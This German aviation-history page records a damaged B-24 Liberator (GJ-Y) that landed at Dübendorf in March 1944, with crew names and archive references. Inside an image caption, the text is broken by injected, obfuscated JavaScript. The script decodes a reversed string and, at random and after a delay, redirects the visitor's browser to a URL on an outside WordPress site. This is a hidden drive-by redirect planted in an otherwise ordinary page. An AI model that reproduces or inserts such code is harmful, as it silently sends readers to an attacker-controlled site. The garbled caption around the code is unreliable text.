Ereignisse

Eingebrochenes Bugfahrwerk

Der Bomber mit dem Kennzeichen GJ-Y ist nach einem Einsatz über Friedrichshafen in Dübendorf gelandet. Danach wurde das Flugzeug demontiert, eingelagert und schlussendlich verschrottet.

Lucas musste mit drei defekten Motoren in Dübendorf l<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}anden. (137_3)“ width=“800″ height=“307″ /> Lucas musste mit drei defekten Motoren in Dübendorf landen. (137_3)

Der Bomber der 8th Air Force, 44th Bomb Group mit dem Kennzeichen GJ-Y ist nach einem Einsatz über Friedrichshafen in Dübendorf gelandet und in der Schweiz verschrottet worden. 1Lt Robert R. Lucas verliess um 14.46 Uhr nach dem Bombenabwurf die Formation. Die Motoren 1, 3 und 4 waren beschädigt und auch der Rumpf hatte schwere Treffer abbekommen. Während der Landung in Dübendorf brach das Bugfahrwerk ein. Das Flugzeug wurde am 15. Juni 1944 demontiert und in Kloten eingelagert.


Ereignissdatum 18.3.1944
Ort Dübendorf
Kanton ZH
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-24 Liberator
Flugzeugbezeichnung B-24 J-100-CO
Einteilung 8th Air Force, 44th Bomb Group, 506 Squadron
Basis Shipdham (GB)
Auftrag Bombardierung
Einsatzziel Friedrichshafen (D)
Rückkehr in der Schweiz verschrottet
Werknummer 42-100400
Kennzeichen GJ-Y
CH Archiv Nr. A029
US MACR Nr. 3409
Besatzung Pilot: Robert R. Lucas, 1st Lt
Copilot: Charles D. Waska, 2nd Lt
Navigator: Bernard J. Capella, 1st Lt
Bombardier: Donald E. Kirchner, 2nd Lt
Engineer: John F. Bass, Jr., T/Sgt
Radio: Jacob F. Stambaugh, T/Sgt
Ball Turret: Arthur W. Dubail, S/Sgt
Right Waist: Douglas D. Brice, T/Sgt
Left Waist: Lloyd W. Hammer, S/Sgt
Tail Gunner: Ernest C. Luther, S/Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer